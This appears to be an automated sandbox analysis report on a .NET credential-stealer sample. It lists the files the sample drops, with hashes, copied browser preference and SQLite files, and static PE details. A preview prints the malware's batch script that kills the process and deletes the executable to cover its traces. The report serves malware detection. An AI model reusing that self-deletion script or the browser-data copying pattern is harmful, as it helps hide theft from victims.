                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.7.9.4.0.5.1.4.9.0.2.6.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.7.9.4.0.5.1.9.9.0.1.6.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.a.5.f.3.2.2.-.e.0.7.3.-.4.2.b.e.-.a.0.2.1.-.9.9.e.b.6.3.6.5.2.c.5.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.8.4.f.3.f.c.-.2.0.a.9.-.4.9.e.6.-.a.2.3.b.-.9.f.8.a.f.7.4.9.6.e.1.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.K.5.M.X.G.V.O.J.E...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.t.e.a.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.8.c.-.0.0.0.1.-.0.0.5.0.-.0.9.8.0.-.c.e.f.4.5.3.4.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.9.e.4.0.2.a.8.f.5.c.6.8.0.c.d.8.4.3.1.0.e.a.9.f.b.a.2.e.c.7.0.0.0.0.0.0.0.0.!.0.0.0.0.f.b.e.b.0.b.c.1.8.8.3.8.b.3.3.c.a.e.c.f.a.4.2.9.f.e.c.8.0.4.3.1.f.c.6.9.c.

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1843.tmp.dmp

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Wed Dec 4 13:54:11 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):257628
                                      Entropy (8bit):4.359599809630461
                                      Encrypted:false
                                      SSDEEP:3072:SLvPz4uEqQZCyDnLTgkv367RjNsCazI2GkL:SLnz4DsyfTgkWgQk
                                      MD5:5EED49AA21B2FDD55A5F89078C475DC1
                                      SHA1:B446FF7DEF5D629A1369A041436886BE7BA3BB1A
                                      SHA-256:986E53AA29E2C720AFB49A827B0ACB0F507CF8E39D26F0F7D11C98644F2AA987
                                      SHA-512:82BE1D9F164827DF71E1F3542A2DB341188EDB14D01AC224B31EAC069855487B464391D763D3135F736A665FF796B57F156D9AF682343567D91F6DFA62B1D205
                                      Malicious:false
                                      Preview:MDMP..a..... ........_Pg............4............+..H.......<...,3.......%..*F..........`.......8...........T............u...x..........h3..........T5..............................................................................bJ.......5......GenuineIntel...........T............^Pg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER197C.tmp.WERInternalMetadata.xml

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8360
                                      Entropy (8bit):3.6845676555729203
                                      Encrypted:false
                                      SSDEEP:192:R9l7lZNij7696YgtSUeWgmfZ2P8pDG89bafsfA7em:R9lnNif696Y6SUXgmfkGaEfAb
                                      MD5:6546F52FCCFB47E8F0F33173FBE0E918
                                      SHA1:0F0FEDD11C3F2D2C1D19074E5D6F17A9CB6E5B5B
                                      SHA-256:5A647A15D9E89731870989424A5F0701A42C5E0EF60A8F9FD42549F7BD4D97B4
                                      SHA-512:0FFFF733FA10453F8E8BA028D9D0268D9E66005DAC2B2488982152629E6856F21C00023AFC25EC6A9EFDEEE6FA000AE4061A69A87EA023CE6F8C96B67F950597
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.3.6.<./.P.i.

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER199C.tmp.xml

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4865
                                      Entropy (8bit):4.493626843371195
                                      Encrypted:false
                                      SSDEEP:48:cvIwwtl8zs9e702I7VFJ5WS2Cfjk3s3rm8M4JyPhpRPlPFdVi+q8vtPhpRPlpX3H:uILfk7GySPfrJyPZPGKtPZPb3L9dFrd
                                      MD5:F4DCC1CEFACA5F49117EB7461D5C8E25
                                      SHA1:EC42CEC074D9E94EFAB65031DB86C035998505CF
                                      SHA-256:8C837BDD7FF60CFA71535661FC090D30AF2C7074D441E2F1BB3965772E78A5C6
                                      SHA-512:956E07A19A13B259C0A8F64A837E654135DF96A77FB3FEF424227ADAED8B4F90CA6483FA9C37249280329C6759ADEE22883F9EB43A94438C377BD92A079CF8B6
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222960425" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

                                      C:\Users\user\AppData\Local\Temp\34kwy3cf.3l5

                                      Download File
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):103985
                                      Entropy (8bit):6.082865991437579
                                      Encrypted:false
                                      SSDEEP:1536:QJFxqXOHF+7gFajcCN5tTsxDxEM0pMtwGUFJ526GH1B1WAUt6+1NJsf:QxwOl+V95+xDxLqMtwGU2B1s6+/K
                                      MD5:6DE273C47E7F54F2910BC516F886633B
                                      SHA1:230A6D3F3510D1231BCDAD4F4BD843F1575A84A5
                                      SHA-256:89545282AD73EE9D530E4BACEE9A2046322C767CB7564E8E12694F30CF8CDDEF
                                      SHA-512:AB5488E0C9622FCC6F4610B0501E79EA87C1963480E8E9F217B46F94E7DDFD32FE0BED9D1329093C58F2D330A49E2D8468CDFD4C6CC8689590671B36F9504617
                                      Malicious:false
                                      Preview:{"accessibility":{"screen_ai":{"last_used_time":"13370432463378508"}},"autofill":{"ablation_seed":"f4fbGGU/iY4=","states_data_dir":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\AutofillStates\\2020.11.2.164946"},"background_tracing":{"session_state":{"privacy_filter":true,"state":0}},"breadcrumbs":{"enabled":false,"enabled_time":"13369750774825357"},"browser":{"default_browser_infobar_declined_count":1,"default_browser_infobar_last_declined_time":"13370432455860460","default_browser_prompt_refresh_study_group":"enabled-v2-arm-3","last_redirect_origin":"","last_whats_new_version":128,"shortcut_migration_version":"92.0.4515.159","whats_new_hats_activation_threshold":64},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"local":{"password_hash_data_list":[]},"management":{"platform"

                                      C:\Users\user\AppData\Local\Temp\fivzguck.rsb

                                      Download File
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):15119
                                      Entropy (8bit):5.63468773874796
                                      Encrypted:false
                                      SSDEEP:384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
                                      MD5:AFC16C019BBEB3904B37576B9179D9CD
                                      SHA1:DBA86847FFE7AD2E887F1A51FBD464357850488D
                                      SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
                                      SHA-512:752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
                                      Malicious:false
                                      Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

                                      C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat

                                      Download File
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):107
                                      Entropy (8bit):5.254787898018293
                                      Encrypted:false
                                      SSDEEP:3:HFTEOuMJcFKsoD2lwBRZDEXEPONy+WWAi0Eyn:yOuMJN6lweonRWAi0Eyn
                                      MD5:FDE4BFB3ED2EBB9F21057EF819C7DA80
                                      SHA1:81070D679A244AE5756F3409A1D78720A8971CCA
                                      SHA-256:E9B43841C37785EC42C877E9F36967D92D9F5F8324B494D45DE94D47DD7E264E
                                      SHA-512:154EFA82EA323620E03BD2830565013DDFCFE2ABD02B1F02790D26E7949E82B5769783FDF8035FF86EC45FA80FBA37DABE470FDDB92D4B054415FA7DAE51FADC
                                      Malicious:false
                                      Preview:chcp 65001..TaskKill /F /IM 4236..Timeout /T 2 /Nobreak..Del /ah "C:\Users\user\Desktop\3K5MXGVOJE.exe"..

                                      C:\Users\user\AppData\Local\Temp\tmpF51B.tmp.dat

                                      Download File
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                      Category:dropped
                                      Size (bytes):98304
                                      Entropy (8bit):0.08231524779339361
                                      Encrypted:false
                                      SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                      MD5:886A5F9308577FDF19279AA582D0024D
                                      SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                      SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                      SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmpF51C.tmp.tmpdb

                                      Download File
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                      Category:dropped
                                      Size (bytes):294912
                                      Entropy (8bit):0.08434615749937499
                                      Encrypted:false
                                      SSDEEP:192:2va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vPY:21zkVmvQhyn+Zoz67R
                                      MD5:93BAA1B7500F3ADB16BE27FCB2E256A8
                                      SHA1:77CB640557F5F7950B083405B4AEE0573D11D98F
                                      SHA-256:7C24FE957EFB0DDF026ECDD88027BE5B40863342CF2CF2A5A7FF72062F75B1E9
                                      SHA-512:C53D09227E5069924E49823CD6E93775B98439D57D279BEEFFE14EA057BF9D9882CE1BC297C0181D0309E027E7993F079D6BF4933A929D2C942903D28DB155AB
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................S`.....z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmpF54B.tmp.dat

                                      Download File
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                      Category:dropped
                                      Size (bytes):122880
                                      Entropy (8bit):1.1414673161713362
                                      Encrypted:false
                                      SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                      MD5:24937DB267D854F3EF5453E2E54EA21B
                                      SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                      SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                      SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmpF54C.tmp.dat

                                      Download File
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                      Category:dropped
                                      Size (bytes):122880
                                      Entropy (8bit):1.1414673161713362
                                      Encrypted:false
                                      SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                      MD5:24937DB267D854F3EF5453E2E54EA21B
                                      SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                      SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                      SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmpF54D.tmp.dat

                                      Download File
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                      Category:dropped
                                      Size (bytes):122880
                                      Entropy (8bit):1.1414673161713362
                                      Encrypted:false
                                      SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                      MD5:24937DB267D854F3EF5453E2E54EA21B
                                      SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                      SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                      SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmpF54E.tmp.dat

                                      Download File
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
                                      Category:dropped
                                      Size (bytes):57344
                                      Entropy (8bit):0.7310370201569906
                                      Encrypted:false
                                      SSDEEP:96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
                                      MD5:A802F475CA2D00B16F45FEA728F2247C
                                      SHA1:AF57C02DA108CFA0D7323252126CC87D7B608786
                                      SHA-256:156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
                                      SHA-512:275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmpF56F.tmp.dat

                                      Download File
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                      Category:dropped
                                      Size (bytes):135168
                                      Entropy (8bit):1.0873605234887023
                                      Encrypted:false
                                      SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                      MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                      SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                      SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                      SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmpF570.tmp.dat

                                      Download File
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 4, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 4
                                      Category:dropped
                                      Size (bytes):49152
                                      Entropy (8bit):0.86528072116055
                                      Encrypted:false
                                      SSDEEP:96:kTN7KLWlGxdKmtZeympbn8MouB6w9f/rrGMa:qVlGxdKN7Iw9fj
                                      MD5:8CC409C8658C3F05143C1484A1719879
                                      SHA1:909CDE14664C0E5F943764895E0A9DFEC7831FF5
                                      SHA-256:BC69C3518DA2ABC8904F314F078D9672BAF3B840E09FD2B2E95D4B07A03A85A4
                                      SHA-512:55D8923B6481ADF442817B7BAA50C36CBAD8DAC0EC600451813D29F4775DE519A06158A6233E61635CD0ED862E60AC7F50C75556C4E89D583D8A8A4299F1808F
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmpF571.tmp.dat

                                      Download File
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                      Category:dropped
                                      Size (bytes):135168
                                      Entropy (8bit):1.0873605234887023
                                      Encrypted:false
                                      SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                      MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                      SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                      SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                      SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmpF572.tmp.dat

                                      Download File
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                      Category:dropped
                                      Size (bytes):135168
                                      Entropy (8bit):1.0873605234887023
                                      Encrypted:false
                                      SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                      MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                      SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                      SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                      SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmpF573.tmp.dat

                                      Download File
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3045002, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):1.4026573159402624
                                      Encrypted:false
                                      SSDEEP:48:TB9aw/aHLopFMavU1/iB8eVC+rQ88TkQqp8JHyDlEKw0esEieNp:1PareMa8K8eVC+rZ8TkQqpWSDlNufp
                                      MD5:F49DFF163167A43F4940B7337A092C07
                                      SHA1:1A8BAAC92537FA0BD39063D17C3072AD86190CC4
                                      SHA-256:B3D38278030DBEA9D1CDDC177F9B6CB590CE1D383A88211B231402B7CA208CF3
                                      SHA-512:BC7685763D70300FE2AE28803D9F886D91004F6045A995065FAAEB6A9DFCAB77E80B475516E9B4C1F8969E112E2B48C7E68FC2AB15F61BB69443A8C54E24066F
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................v.......@..g.....@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\appcompat\Programs\Amcache.hve

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:MS Windows registry file, NT/2000 or above
                                      Category:dropped
                                      Size (bytes):2359296
                                      Entropy (8bit):4.3613348279476725
                                      Encrypted:false
                                      SSDEEP:49152:RZAhNXBlw3Ak2BGUS5Dc0Uag6nSz8a8aO:G
                                      MD5:BA1CF1165833E8BBA124C298C1874F77
                                      SHA1:70F67ADDB69299C6090BD30FF4720666D63EEDFD
                                      SHA-256:27F3B449F577C6C99A040FCDD4E4E385482BA713A54C87B6D490FA4FA749BD85
                                      SHA-512:2741449AF7FF496A9274E50A07F5277A8AE0D153DC001120F25EB362AD01C34A91274FB2D9B8060D74F65CBE7376396D3342626709C6788F64FC6A54B1E36A47
                                      Malicious:false
                                      Preview:regf........5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtmN.X.!F..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\appcompat\Programs\Amcache.hve.LOG1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:MS Windows registry file, NT/2000 or above
                                      Category:dropped
                                      Size (bytes):73728
                                      Entropy (8bit):4.640025520894351
                                      Encrypted:false
                                      SSDEEP:768:bqQyP8n92v+FSLAbURlLlP9RyOuiruMsMd8dMwDGY0i5fRFrsJpyG2gKOrndx7sK:2dee9ruiruoSRFrsJdNYP0Ggyf
                                      MD5:DEBAC5066CF670E440AED127A70DFD45
                                      SHA1:08240A1E60D12BA90B8379A3DF3A64218C1DC4D5
                                      SHA-256:9872C3380BF70659DCEAFF093466AA13B70D8E0FDC60A9D3427B6B2D00E5A019
                                      SHA-512:E8963F69C840271F3E4286EA86409437833562DB71C06737244F2C0772364522DA603907245967A496D618CA0C2EAD41D4BC6F1E54F2A392CD8D99B4BCAD598D
                                      Malicious:false
                                      Preview:regf........5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtmN.X.!F..................................................................................................................................................................................................................................................................................................................................................HvLE..............!......fd..!... .-.h.......................... .......p...............................P...............................`... ..........................hbin................5.#.^...........nk,....S....... .......................................................&...{11517B7C-E79D-4e20-961B-75A811715ADD}......nk .....9......(...........@...............................*...N.......)...InventoryMiscellaneousMemorySlotArrayInfo....................mG.....nk .$4./T....... ...

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.27057880752327
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                      • Win32 Executable (generic) a (10002005/4) 49.96%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:3K5MXGVOJE.exe
                                      File size:1'005'056 bytes
                                      MD5:532e953689741622b91a29f7db4bcce0
                                      SHA1:fbeb0bc18838b33caecfa429fec80431fc69c469
                                      SHA256:dd503955140cfd86c1189e79bfd7b0c7b5ebc7ff7348fd9180486362614a880d
                                      SHA512:03b3999bcb1bf1a206ea506f809992042d406d5561b9b0e379a36f868e0ee5c71117449072072fa5b63fe86458607d130cf6940da7c9eba964280d7d87b9f628
                                      SSDEEP:24576:B679r/wgkC9X7JqkbM1SVoFoxvUAZOpucAClz:GS8XAkoIVoFMvJO0O
                                      TLSH:4525BF182ACCCD86C6890333E46240F5D5F0BA55F6CBD3A6B5497AE93FAD3B4E4050A7
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ........@.. ....................................`................................

                                      File Icon

                                      Icon Hash:90cececece8e8eb0

                                      Static PE Info

                                      General

                                      Entrypoint:0x42abea
                                      Entrypoint Section:.text
                                      Digitally signed:false
